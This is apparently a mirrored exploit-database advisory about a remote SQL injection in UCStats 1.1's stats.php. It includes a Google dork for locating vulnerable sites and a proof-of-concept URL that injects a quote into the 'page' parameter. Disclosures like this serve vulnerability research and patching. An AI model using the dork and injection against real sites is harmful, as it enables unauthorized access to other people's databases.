UCStats 1.1 – SQL Injection

  • 作者: Sora
    日期: 2010-01-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/10891/
  • > UCStats 1.1 Remote SQL Injection Vulnerability
    > Author: Sora
    > Contact: vhr95zw [at] hotmail [dot] com
    > Website: http://greyhathackers.wordpress.com/
    > Google Dork: "Powered by UCStats version 1.1"
    
    # Vulnerability Description:
    UCStats version 1.1 suffers a remote SQL injection vulnerability in stats.php.
    
    # Code/Proof of Concept (PoC):
    http://server/stats.php?game=cstrike&q=players&page=4'&sort=online&dir=asc